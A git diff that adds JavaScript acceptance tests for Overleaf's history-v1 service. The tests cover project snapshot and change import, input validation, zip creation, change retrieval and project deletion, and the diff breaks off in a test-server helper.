require('./support/test_server') + +const core = require('overleaf-editor-core') +const testProjects = require('./support/test_projects') +const Change = core.Change +const ChunkResponse = core.ChunkResponse +const File = core.File +const Operation = core.Operation +const Origin = core.Origin +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation +const V2DocVersions = core.V2DocVersions + +const knex = require('../../../../storage').knex + +describe('history import', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + function changeToRaw(change) { + return change.toRaw() + } + + function makeChange(operation) { + return new Change([operation], new Date(), []) + } + + let basicAuthClient + let pseudoJwtBasicAuthClient + let clientForProject + + before(async function () { + basicAuthClient = testServer.basicAuthClient + pseudoJwtBasicAuthClient = testServer.pseudoJwtBasicAuthClient + clientForProject = await testServer.createClientForProject('1') + }) + + it('creates blobs and then imports a snapshot and history', function () { + // We need to be able to set the projectId to match an existing doc ID. + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testAuthors = [123, null] + const testTextOperation0 = TextOperation.fromJSON({ textOperation: ['a'] }) + const testTextOperation1 = TextOperation.fromJSON({ + textOperation: [1, 'b'], + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Try importing the project again + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(() => { + // Check that importing a duplicate fails + expect.fail() + }) + .catch(expectResponse.conflict) + .then(() => { + // Get project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the imported history is valid + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const snapshot = chunk.getSnapshot() + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getHash()).to.eql(File.EMPTY_FILE_HASH) + expect(chunk.getChanges().length).to.equal(0) + expect(chunk.getEndVersion()).to.equal(0) + }) + .then(() => { + // Import changes with an end version + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation0)), + makeChange(Operation.editFile(testFilePathname, testTextOperation1)), + ] + changes[0].setAuthors(testAuthors) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + changes: changes.map(changeToRaw), + end_version: 0, + return_snapshot: 'hashed', + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + testFiles.STRING_AB_HASH + ) + }) + + .then(() => { + // Get project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the history is valid + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const chunk = chunkResponse.getChunk() + const snapshot = chunk.getSnapshot() + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(chunk.getChanges().length).to.equal(2) + const changeWithAuthors = chunk.getChanges()[0] + expect(changeWithAuthors.getAuthors().length).to.equal(2) + expect(changeWithAuthors.getAuthors()).to.deep.equal(testAuthors) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + }) + .then(() => { + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should retrieve the same chunk + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const chunk = chunkResponse.getChunk() + expect(chunk.getChanges().length).to.equal(2) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + }) + .then(() => { + // Get project's latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the content is valid + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getContent()).to.equal('ab') + }) + }) + + it('rejects invalid changes in history', function () { + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testTextOperation = TextOperation.fromJSON({ + textOperation: ['a', 10], + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import invalid changes + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that this fails + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get the latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes have been stored + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + const file = snapshot.getFile(testFilePathname) + expect(file.getContent()).to.equal('') + }) + .then(() => { + // Send a change with the wrong end version that is not conflicting + // with the latest snapshot + const changes = [makeChange(Operation.removeFile(testFilePathname))] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 10000, + changes, + }) + }) + .then(() => { + // Check that this fails + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get the latest project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes have been stored + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes).to.have.length(0) + }) + }) + + it('creates and edits a file using changes', function () { + const testProjectId = '1' + const mainFilePathname = 'main.tex' + const testFilePathname = 'test.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['a'] }) + const inexistentAuthors = [1234, 5678] + const projectVersion = '12345.0' + const v2DocVersions = new V2DocVersions({ + 'random-doc-id': { pathname: 'doc-path.tex', v: 123 }, + }) + const testLabelOrigin = Origin.fromRaw({ + kind: 'saved ver', + }) + const testRestoreOrigin = Origin.fromRaw({ + kind: 'restore', + timestamp: '2016-01-01T00:00:00', + version: 1, + }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import a project + testSnapshot = new Snapshot() + testSnapshot.addFile( + mainFilePathname, + File.fromHash(File.EMPTY_FILE_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check that the project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + changes[0].setProjectVersion(projectVersion) + changes[1].setAuthors(inexistentAuthors) + changes[1].setV2DocVersions(v2DocVersions) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + File.EMPTY_FILE_HASH + ) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + }) + .then(() => { + // Get the project history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should not fail when the some of the authors do not exist anymore + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes.length).to.equal(2) + const changeWithAuthor = changes[1] + expect(changeWithAuthor.getAuthors()).to.deep.equal(inexistentAuthors) + }) + .then(() => { + // it should retrieve the latest snapshot when the changes set is empty + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: [], + }) + }) + .then(response => { + // Check latest snapshot + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + File.EMPTY_FILE_HASH + ) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + expect(snapshot.getProjectVersion()).to.equal(projectVersion) + expect(snapshot.getV2DocVersions()).to.deep.equal(v2DocVersions) + }) + .then(() => { + // Import changes with origin + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.removeFile(testFilePathname)), + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + changes[0].setOrigin(testLabelOrigin) + changes[1].setOrigin(testRestoreOrigin) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Get the latest history + return clientForProject.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that the origin is stored + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes).to.have.length(4) + expect(changes[2].getOrigin()).to.deep.equal(testLabelOrigin) + expect(changes[3].getOrigin()).to.deep.equal(testRestoreOrigin) + }) + .then(() => { + // Import invalid changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [makeChange(Operation.addFile('../../a.tex', testFile))] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that this fails and returns a 422 + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it('rejects text operations on binary files', function () { + const testProjectId = '1' + const testFilePathname = 'main.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['bb'] }) + + let testSnapshot + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.NON_BMP_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('non_bmp.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import a project + testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(response => { + // Check that the project is valid + expect(response.obj.projectId).to.equal(testProjectId) + }) + .then(() => { + // Import invalid changes + const changes = [ + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(() => { + // Get latest content + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + }) + .then(response => { + // Check that no changes were stored + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(testFilePathname).getHash()).to.equal( + testFiles.NON_BMP_TXT_HASH + ) + }) + }) + + it('accepts text operation on files with null characters if stringLength is present', function () { + const testProjectId = '1' + const mainFilePathname = 'main.tex' + const testTextOperation = TextOperation.fromJSON({ + textOperation: [3, 'a'], + }) + + let testSnapshot + + function importChanges() { + const changes = [ + makeChange(Operation.editFile(mainFilePathname, testTextOperation)), + ] + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + } + + function getLatestContent() { + return clientForProject.apis.Project.getLatestContent({ + project_id: testProjectId, + }) + } + + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.NULL_CHARACTERS_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('null_characters.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import project + testSnapshot = new Snapshot() + testSnapshot.addFile( + mainFilePathname, + File.fromHash(testFiles.NULL_CHARACTERS_TXT_HASH) + ) + return basicAuthClient.apis.ProjectImport.importSnapshot1({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + }) + .then(importChanges) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + .then(getLatestContent) + .then(response => { + // Check that no chaes were made + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(mainFilePathname).getHash()).to.equal( + testFiles.NULL_CHARACTERS_TXT_HASH + ) + }) + .then(() => { + // Set string length + return knex('project_blobs').update( + 'string_length', + testFiles.NULL_CHARACTERS_TXT_BYTE_LENGTH + ) + }) + .then(importChanges) + .then(getLatestContent) + .then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile(mainFilePathname).getContent()).to.equal( + '\x00\x00\x00a' + ) + }) + }) + + it('returns 404 when chunk is not found in bucket', function () { + const testProjectId = '1' + const fooChange = makeChange(Operation.removeFile('foo.tex')) + + return knex('chunks') + .insert({ + doc_id: testProjectId, + start_version: 0, + end_version: 100, + end_timestamp: null, + }) + .then(() => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 100, + changes: [fooChange.toRaw()], + }) + }) + .then(() => { + // Expect invalid changes to fail + expect.fail() + }) + .catch(expectResponse.notFound) + }) + + it('creates and returns changes with v2 author ids', function () { + const testFilePathname = 'test.tex' + const testTextOperation = TextOperation.fromJSON({ textOperation: ['a'] }) + const v2Authors = ['5a296963ad5e82432674c839', null] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + makeChange(Operation.editFile(testFilePathname, testTextOperation)), + ] + changes[1].setV2Authors(v2Authors) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + }) + .then(() => { + // Get project history + return pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should not fail when the some of the authors do not exist anymore + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes.length).to.equal(2) + const changeWithAuthor = changes[1] + expect(changeWithAuthor.getV2Authors()).to.deep.equal(v2Authors) + }) + }) + + it('should reject invalid v2 author ids', function () { + const testFilePathname = 'test.tex' + const v2Authors = ['not-a-v2-id'] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + + changes[0].v2Authors = v2Authors + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it('should reject changes with both v1 and v2 authors ids', function () { + const testFilePathname = 'test.tex' + const v1Authors = [456] + const v2Authors = ['5a296963ad5e82432674c839', null] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + + changes[0].authors = v1Authors + changes[0].v2Authors = v2Authors + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it("returns unprocessable if end_version isn't provided", function () { + return testProjects + .createEmptyProject() + .then(projectId => { + expect(projectId).to.be.a('string') + return projectId + }) + .then(projectId => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [], + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(error => { + expect(error.message).to.equal( + 'Required parameter end_version is not provided' + ) + }) + }) + + it('returns unprocessable if return_snapshot is invalid', function () { + return testProjects + .createEmptyProject() + .then(projectId => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [], + end_version: 0, + return_snapshot: 'not_a_valid_value', + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(error => { + expect(error.status).to.equal(HTTPStatus.UNPROCESSABLE_ENTITY) + expect(error.response.body.message).to.equal( + 'invalid enum value: return_snapshot' + ) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/projects.test.js b/services/history-v1/test/acceptance/js/api/projects.test.js new file mode 100644 index 0000000..3c333d8 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/projects.test.js @@ -0,0 +1,333 @@ +'use strict' + +const { expect } = require('chai') +const fs = require('node:fs') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const sinon = require('sinon') + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') + +const { zipStore, persistChanges } = require('../../../../storage') + +const { expectHttpError } = require('./support/expect_response') +const testServer = require('./support/test_server') +const { createEmptyProject } = require('./support/test_projects') + +const { + File, + Snapshot, + Change, + AddFileOperation, + EditFileOperation, + TextOperation, +} = require('overleaf-editor-core') +const testProjects = require('./support/test_projects') + +describe('project controller', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + describe('initializeProject', function () { + it('can initialize a new project', async function () { + const projectId = await testProjects.createEmptyProject() + expect(projectId).to.be.a('string') + }) + }) + + describe('createZip', function () { + let importSnapshot + let createZip + + before(function () { + importSnapshot = + testServer.basicAuthClient.apis.ProjectImport.importSnapshot1 + createZip = testServer.basicAuthClient.apis.Project.createZip + }) + + beforeEach(function () { + // Don't start the work in the background in this test --- it is flaky. + sinon.stub(zipStore, 'storeZip').resolves() + }) + afterEach(function () { + zipStore.storeZip.restore() + }) + + it('creates a URL to a zip file', async function () { + // Create a test blob. + const testProjectId = fixtures.docs.uninitializedProject.id + const response = await fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('hello.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + expect(response.ok).to.be.true + + // Import a project with the test blob. + const testFilePathname = 'hello.txt' + const testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(testFiles.HELLO_TXT_HASH) + ) + + const importResponse = await importSnapshot({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + expect(importResponse.obj.projectId).to.equal(testProjectId) + + const createZipResponse = await createZip({ + project_id: testProjectId, + version: 0, + }) + expect(createZipResponse.status).to.equal(HTTPStatus.OK) + const zipInfo = createZipResponse.obj + expect(zipInfo.zipUrl).to.match( + /^http:\/\/gcs:9090\/download\/storage\/v1\/b\/overleaf-test-zips/ + ) + expect(zipStore.storeZip.calledOnce).to.be.true + }) + }) + + // eslint-disable-next-line mocha/no-skipped-tests + describe.skip('getLatestContent', function () { + // TODO: remove this endpoint entirely, see + // https://github.com/overleaf/write_latex/pull/5120#discussion_r244291862 + }) + + describe('project with changes', function () { + let projectId + + beforeEach(async function () { + // used to provide a limit which forces us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('ab'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('other.tex', File.fromString('hello'))], + new Date(), + [] + ), + ] + + projectId = await createEmptyProject() + await persistChanges(projectId, changes, limits, 0) + }) + + describe('getLatestHashedContent', function () { + it('returns a snapshot', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getLatestHashedContent({ + project_id: projectId, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_AB_HASH + ) + }) + }) + + describe('getChanges', function () { + it('returns all changes when not given a limit', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(2) + const filenames = changes + .flatMap(change => change.operations) + .map(operation => operation.pathname) + expect(filenames).to.deep.equal(['test.tex', 'other.tex']) + }) + + it('returns only requested changes', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: 1, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(1) + const filenames = changes + .flatMap(change => change.operations) + .map(operation => operation.pathname) + expect(filenames).to.deep.equal(['other.tex']) + }) + + it('rejects negative versions', async function () { + await expect( + testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: -1, + }) + ).to.be.rejectedWith('Bad Request') + }) + + it('rejects out of bounds versions', async function () { + await expect( + testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: 20, + }) + ).to.be.rejectedWith('Bad Request') + }) + }) + }) + + describe('project with many chunks', function () { + let projectId + + beforeEach(async function () { + // used to provide a limit which forces us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChunkChanges: 5, + } + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString(''))], + new Date(), + [] + ), + ] + + for (let i = 0; i < 20; i++) { + const textOperation = new TextOperation() + textOperation.retain(i) + textOperation.insert('x') + changes.push( + new Change( + [new EditFileOperation('test.tex', textOperation)], + new Date(), + [] + ) + ) + } + + projectId = await createEmptyProject() + await persistChanges(projectId, changes, limits, 0) + }) + + it('returns all changes when not given a limit', async function () { + const response = await testServer.basicAuthClient.apis.Project.getChanges( + { + project_id: projectId, + } + ) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(21) + expect(changes[10].operations[0].textOperation).to.deep.equal([9, 'x']) + }) + + it('returns only requested changes', async function () { + const response = await testServer.basicAuthClient.apis.Project.getChanges( + { + project_id: projectId, + since: 10, + } + ) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(11) + expect(changes[2].operations[0].textOperation).to.deep.equal([11, 'x']) + }) + }) + + describe('getLatestHistoryRaw', function () { + it('should handles read', async function () { + const projectId = fixtures.docs.initializedProject.id + const response = + await testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistoryRaw( + { + project_id: projectId, + readOnly: 'true', + } + ) + expect(response.body).to.deep.equal({ + startVersion: 0, + endVersion: 1, + endTimestamp: '2032-01-01T00:00:00.000Z', + }) + }) + }) + + describe('deleteProject', function () { + it('deletes the project chunks', async function () { + const projectId = fixtures.docs.initializedProject.id + const historyResponse = + await testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory( + { + project_id: projectId, + } + ) + expect(historyResponse.status).to.equal(HTTPStatus.OK) + expect(historyResponse.body).to.have.property('chunk') + const deleteResponse = + await testServer.basicAuthClient.apis.Project.deleteProject({ + project_id: projectId, + }) + expect(deleteResponse.status).to.equal(HTTPStatus.NO_CONTENT) + await expectHttpError( + testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: projectId, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('deletes the project blobs', async function () { + const projectId = fixtures.docs.initializedProject.id + const token = testServer.createTokenForProject(projectId) + const authHeaders = { Authorization: `Bearer ${token}` } + const hash = testFiles.HELLO_TXT_HASH + const fileContents = await fs.promises.readFile( + testFiles.path('hello.txt') + ) + const blobUrl = testServer.url(`/api/projects/${projectId}/blobs/${hash}`) + const response1 = await fetch(blobUrl, { + method: 'PUT', + headers: authHeaders, + body: fileContents, + }) + expect(response1.ok).to.be.true + const response2 = await fetch(blobUrl, { headers: authHeaders }) + const payload = await response2.text() + expect(payload).to.equal(fileContents.toString()) + const deleteResponse = + await testServer.basicAuthClient.apis.Project.deleteProject({ + project_id: projectId, + }) + expect(deleteResponse.status).to.equal(HTTPStatus.NO_CONTENT) + const response3 = await fetch(blobUrl, { headers: authHeaders }) + expect(response3.status).to.equal(HTTPStatus.NOT_FOUND) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/support/expect_response.js b/services/history-v1/test/acceptance/js/api/support/expect_response.js new file mode 100644 index 0000000..cdab3d3 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/expect_response.js @@ -0,0 +1,53 @@ +'use strict' + +const { expect } = require('chai') +const HTTPStatus = require('http-status') + +function expectStatus(err, expected) { + const httpStatus = err.status || err.statusCode + if (httpStatus === undefined) { + throw err + } else { + expect(httpStatus).to.equal(expected) + } +} + +async function expectHttpError(promise, expectedStatusCode) { + try { + await promise + } catch (err) { + const statusCode = err.status || err.statusCode + if (statusCode === undefined) { + throw err + } else { + expect(statusCode).to.equal(expectedStatusCode) + return + } + } + expect.fail('expected HTTP request to return with an error response') +} + +exports.expectHttpError = expectHttpError +exports.notFound = function (err) { + expectStatus(err, HTTPStatus.NOT_FOUND) +} + +exports.unprocessableEntity = function (err) { + expectStatus(err, HTTPStatus.UNPROCESSABLE_ENTITY) +} + +exports.conflict = function (err) { + expectStatus(err, HTTPStatus.CONFLICT) +} + +exports.unauthorized = function (err) { + expectStatus(err, HTTPStatus.UNAUTHORIZED) +} + +exports.forbidden = function (err) { + expectStatus(err, HTTPStatus.FORBIDDEN) +} + +exports.requestEntityTooLarge = function (err) { + expectStatus(err, HTTPStatus.REQUEST_ENTITY_TOO_LARGE) +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs b/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs new file mode 100644 index 0000000..335eb0b --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs @@ -0,0 +1,51 @@ +// @ts-check +import config from 'config' +import { startApp } from '../../../../../backup-deletion-app.mjs' + +/** @type {import("http").Server} */ +let server + +/** + * @param {string} pathname + * @return {string} + */ +function testUrl(pathname) { + const url = new URL('http://127.0.0.1') + const addr = server.address() + if (addr && typeof addr === 'object') { + url.port = addr.port.toString() + } + url.pathname = pathname + return url.toString() +} + +const basicAuthHeader = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 